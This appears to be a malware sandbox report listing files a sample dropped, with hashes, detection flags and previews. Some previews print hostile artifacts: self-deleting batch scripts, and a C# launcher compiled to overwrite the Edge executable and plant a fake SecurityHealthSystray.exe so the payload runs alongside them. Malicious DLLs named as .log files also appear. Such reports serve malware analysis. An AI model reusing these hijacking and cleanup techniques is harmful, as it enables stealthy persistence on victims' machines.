                                                    SHA-512:05AFC25BA53913F0685075B6EC27A2A416168CB7A6D5C869D2F3DBA06AAD88633F1A709DD51AA1EDC946FF74E6271D9D3A5652FE4E0B8F226A452FDF6BAED36F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\Lz8GlOhUbo

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.163856189774724
                                                    Encrypted:false
                                                    SSDEEP:3:kTynh:S4
                                                    MD5:BB9A3F21D31AFF2EFB86C5B343D35C9C
                                                    SHA1:EB6FFDA68A0282546D0B3E3EDB9DF2D2BF15945A
                                                    SHA-256:B54C8ECC5F77920FAC3666322D4DE2C381F584BF898984B7983ACF7B70EF6DE3
                                                    SHA-512:D5F75CCBD77610B0B0E5DE3C28930AF19568AF8715CB75766F92D896D5AD05E721A7BFCDF49F989842B2944D205EB374A2C5B2F39C47D6AEA9DCD11547C51E3D
                                                    Malicious:false
                                                    Preview:Dg4SZ3vJJsgLBU9uhvN9qaSh8

                                                    C:\Users\user\AppData\Local\Temp\RESD41E.tmp

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Wed Jul 3 15:44:08 2024, 1st section name ".debug$S"
                                                    Category:dropped
                                                    Size (bytes):1924
                                                    Entropy (8bit):4.616468313413664
                                                    Encrypted:false
                                                    SSDEEP:48:FyLzHxJTMKTNmslmuulB+hnqXSfbNtmhn:MnHxJIKTws2TkZzNtyn
                                                    MD5:8C7636409261831400DB4078DBAEAB8A
                                                    SHA1:E4E4C58E19C93286F58C36FB2E68CCDC8D90A299
                                                    SHA-256:6ED3B8B8D7CF04FEE59438F7FBA84F382635A8598C5740EC9741BD85861353F8
                                                    SHA-512:7AFF9BA5B3F683CF33EAAEDE98110E246FE477E851524BBEC4ECB71AA3AF9C8C18C9044B0F1580EFE6D7297594D46D485FC9054CBE28B3356E436FF0DE32AF5D
                                                    Malicious:false
                                                    Preview:L....q.f.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC76655AD3B5B14A58A99CB3ECAE1D1A90.TMP....................q.QK.......N..........3.......C:\Users\user\AppData\Local\Temp\RESD41E.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.

                                                    C:\Users\user\AppData\Local\Temp\RESD631.tmp

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Wed Jul 3 15:44:09 2024, 1st section name ".debug$S"
                                                    Category:dropped
                                                    Size (bytes):1948
                                                    Entropy (8bit):4.560953863711213
                                                    Encrypted:false
                                                    SSDEEP:24:HSG9EnOOM7tUTHfwKTF7mNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:sotUTIKTNmEluOulajfqXSfbNtmhY2Z
                                                    MD5:324CA34E251CEC60B063388454EFEC3C
                                                    SHA1:16793ECC8FA72014BBCAFDD7B7DB98A6BD67330A
                                                    SHA-256:D12313FCE202E5F5F9CD8BA278C5D0AAE3C1B4C98029C8E4E3A38FD1F96CDDCA
                                                    SHA-512:08B89A3A9116F91EEE33027A5B1C4663163C77833BEC5D9D864D5664B3F778E2316EB808955BBE56E8596409F5BE1569B709FDACD98CDAC54414306E15BE8BD5
                                                    Malicious:false
                                                    Preview:L....q.f.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........;....c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP...................r.av..t.y..............3.......C:\Users\user\AppData\Local\Temp\RESD631.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.

                                                    C:\Users\user\AppData\Local\Temp\RQxNQiaB3w

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1368932887859682
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                    MD5:9A534FD57BED1D3E9815232E05CCF696
                                                    SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                    SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                    SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\S4JgYSVqKb

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\Ul0yixeSy1

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.483856189774723
                                                    Encrypted:false
                                                    SSDEEP:3:rUOgSBAQ:IOXBAQ
                                                    MD5:AEBF90D979165F93607E84D66D943BE2
                                                    SHA1:279594DF27EEA6D9DE50A9F2618C50409DF106E9
                                                    SHA-256:C010A3BF6D6310E41FFC8DC7745755BDA76475C95E6E4D9943E6F4B3F0E9A5A5
                                                    SHA-512:5E97E349D16D96B9E9CBBFF83B89FBC7964421A6404A21F47870BB4B1844EA74FCCD373288E70A4AAB3E203A4FAA628B698D179E3D2994D17465C771912C2630
                                                    Malicious:false
                                                    Preview:zfZT1BFUgwCzX7xjvsbAHByNa

                                                    C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):246
                                                    Entropy (8bit):5.241547274750078
                                                    Encrypted:false
                                                    SSDEEP:6:hCijTg3Nou1SV+DE1kAOXF7IthxhGvKOZG1Fi23fpxDHn:HTg9uYDE4VctUSZBJHn
                                                    MD5:6292538CD0390751F01DBB25BBBE6FB8
                                                    SHA1:2A2458FFD385A519B1F16B145BBAD056375B7867
                                                    SHA-256:AB2CA8EEBA376303306E6371264CBCCAB03D113A318B5B3B3D5330097148997B
                                                    SHA-512:E89B72CE8022F6244D68523B72697ADE3A6E56F064E8F12743108D8170B5ABB091AE71D57AB04311C20F5710F82D39C8C5B4EB9D136E632203279539C1E8D18C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\WAeZ9wWpbS.bat"

                                                    C:\Users\user\AppData\Local\Temp\XRbfGtKxff

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.0.cs

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                    Category:dropped
                                                    Size (bytes):391
                                                    Entropy (8bit):4.976194589667253
                                                    Encrypted:false
                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LuriFkD:JNVQIbSfhV7TiFkMSfhWLumFkD
                                                    MD5:9CDCDA8140C021A4111C513222BFB45C
                                                    SHA1:65DF9B55815F7CFCAE35F6A20F078D83B5F627ED
                                                    SHA-256:A3C3FE34EB6303790DA3A42F79FF7388459261A8A5AE4424E70E601AAB1A6E8D
                                                    SHA-512:AE9C2912EDF134C4CEB2EEE246EB6416951B0B2FC2834D6F39F55C356305EC33AFDE25A73BB6E6082A5EAD2DFEF640A1C564380DFD29303AE760681A142CE9F3
                                                    Malicious:false
                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\java\jre-1.8\upfc.exe"); } catch { } }).Start();. }.}.

                                                    C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):249
                                                    Entropy (8bit):5.084607394536653
                                                    Encrypted:false
                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oFi23fXZT+fA:Hu7L//TRq79cQjZhS4
                                                    MD5:6022CBCE8F940E0230CC9CB93716B1A9
                                                    SHA1:B416FD36CF8C905C68E68FBCE072C27D0ABECB1B
                                                    SHA-256:705275B16EF325992CF229228B5DDDE47C9EEB035A3837375E22094D46159B49
                                                    SHA-512:63ECE0323E26DA705BEE22E9109AF5AA6B5F4964B1CE7D6723BBB085C4E4E10131566D677807F4817122AC4B553649642FF4F97673342780329AF967DCBBBDE1
                                                    Malicious:false
                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.0.cs"

                                                    C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.out

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (327), with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):748
                                                    Entropy (8bit):5.251450145012145
                                                    Encrypted:false
                                                    SSDEEP:12:Ky/I/u7L//TRq79cQjZhStKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KYI/un/Vq79t9aKax5DqBVKVrdFAMBJj
                                                    MD5:B0DE2746A69CD866DB1EF4789ED29EB1
                                                    SHA1:008FC96FEB35C23E1B45B2654DA3E128DAEBB3ED
                                                    SHA-256:BA78FA50ED918F94469C84B7A4991F4BCFC2262FB272A7F680EFF7E896B0EED8
                                                    SHA-512:A38918A2745210AD382534C74DBDD668A9089BA24CD749535FE16AFEEAE00B25B63B920E3ED24515A898CB4F15DB1E6D19567723F3E08ECFAB9B5FE35AB705DD
                                                    Malicious:false
                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                    C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.0.cs

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                    Category:dropped
                                                    Size (bytes):406
                                                    Entropy (8bit):4.98831312720577
                                                    Encrypted:false
                                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LuriFkD:JNVQIbSfhWLzIiFkMSfhWLumFkD
                                                    MD5:127E081305B5557B461A5ABD453CBC45
                                                    SHA1:252934F3031FDBDB598A08EA6FDA6647D1C6549C
                                                    SHA-256:EED7888AEFD2B8B15805860ED65F868D0340F4DDF7C5B422DC302253D81395FF
                                                    SHA-512:189ACC3E6EF81E98DC80C0640EF6ECA3DD692A1DC47AE414FCA0199F8A8C1A6461632EB10F8906C393DB86BCEAF0325B1AEAB6AE8DFF51ABA874D6D5E81798AD
                                                    Malicious:false
                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\java\jre-1.8\upfc.exe"); } catch { } }).Start();. }.}.

                                                    C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):264
                                                    Entropy (8bit):5.189559592032363
                                                    Encrypted:false
                                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oFi23f7N:Hu7L//TRRzscQjZp
                                                    MD5:5592B8161E80E517A30EB9C6A2246020
                                                    SHA1:E9906A66D3B28B1781C33C805D35120F7D1100FF
                                                    SHA-256:481060751A51201CEFBEEB3FB7F91C3F4A72C4D18728F54E5C0A40D86264A184
                                                    SHA-512:CE5B651716AFF719922FB737ADEA8BFFC2E78F0DCA78CA638439259E5D510A1843CAD457C0DC541AF13E822FA87CD710DA002B1984C7648E44551C08319250E8
                                                    Malicious:true
                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.0.cs"

                                                    C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.out

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (342), with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):763
                                                    Entropy (8bit):5.266347304276392
                                                    Encrypted:false
                                                    SSDEEP:12:Ky/I/u7L//TRRzscQjZsKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KYI/un/VRzst9sKax5DqBVKVrdFAMBJj
                                                    MD5:7592B67A8F4D0E51C6779955225BD3F7
                                                    SHA1:62001AE0D2B19D39671A7CF0E9268638D7A658BD
                                                    SHA-256:72C6235E9AB864FECB36CBF01DF06DF6C7D61F47F008F22E25BA331B20709877
                                                    SHA-512:56881957873BA66A0A8077C23D7E375BB7AAFDD537DD0C65926E17765D24A867DFCBD0A0BC2615CB900DD1D93AF9D400B277BDFB38F6F35395423CBD7318C307
                                                    Malicious:false
                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                    C:\Users\user\AppData\Local\Temp\qZrUVSx8Oj

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1211596417522893
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                    MD5:0AB67F0950F46216D5590A6A41A267C7
                                                    SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                    SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                    SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\tfVhKC50lX.bat

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):290
                                                    Entropy (8bit):5.252131870880147
                                                    Encrypted:false
                                                    SSDEEP:6:hCijTg3Nou1ShCZGR5usKOZGR5sHG2OZG1Fi23f4jpHEh:HTg9uDuv2ZH
                                                    MD5:57A1892F3CFC550F82C9A1843F4C4A16
                                                    SHA1:C398FCFEC76CCF34878B1327FB9B692C11E0ABB4
                                                    SHA-256:8A5CB274EFF4ACA287BD06C0A28C34DF6CB3E2AC1D870EC1888798F472EBCC18
                                                    SHA-512:A40A80B62BDD7AB0D5B13E58DDA6E0EA1ABBA0189D4915BBE5B2FB111E5EB5874AB3E1E8DADF9CFC8F994C3FD20B2E5A23E5DCD4FD7F0922C351EC2E5F133950
                                                    Malicious:false
                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..del /a /q /f "C:\Program Files (x86)\java\jre-1.8\upfc.exe"..del /a /q /f "C:\Program Files (x86)\java\jre-1.8\ea1d8f6d871115"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\tfVhKC50lX.bat"

                                                    C:\Users\user\AppData\Local\Temp\vbwUCvifDl

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1211596417522893
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                    MD5:0AB67F0950F46216D5590A6A41A267C7
                                                    SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                    SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                    SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\yc70I5nJH6

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.6732424250451717
                                                    Encrypted:false
                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\Desktop\AHphtSeX.log

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):23552
                                                    Entropy (8bit):5.519109060441589
                                                    Encrypted:false
                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Joe Sandbox View:
                                                    • Filename: Vg46FzGtNo.exe, Detection: malicious, Browse
                                                    • Filename: 6Z4Q4bREii.exe, Detection: malicious, Browse
                                                    • Filename: BbaXbvOA7D.exe, Detection: malicious, Browse
                                                    • Filename: cL7A9wGE3w.exe, Detection: malicious, Browse
                                                    • Filename: j05KsN2280.exe, Detection: malicious, Browse
                                                    • Filename: 2lR1Spui9w.exe, Detection: malicious, Browse
                                                    • Filename: b8khu7cOny.exe, Detection: malicious, Browse
                                                    • Filename: hnCn8gE6NH.exe, Detection: malicious, Browse
                                                    • Filename: l4R8w1Q8lC.exe, Detection: malicious, Browse
                                                    • Filename: yF4L47gYLd.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                    C:\Users\user\Desktop\CUcqaUVf.log

                                                    Download File
                                                    Process:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):32256
                                                    Entropy (8bit):5.631194486392901
                                                    Encrypted:false
                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                    C:\Users\user\Desktop\FUSHtkHk.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.932541123129161
                                                    Encrypted:false
                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
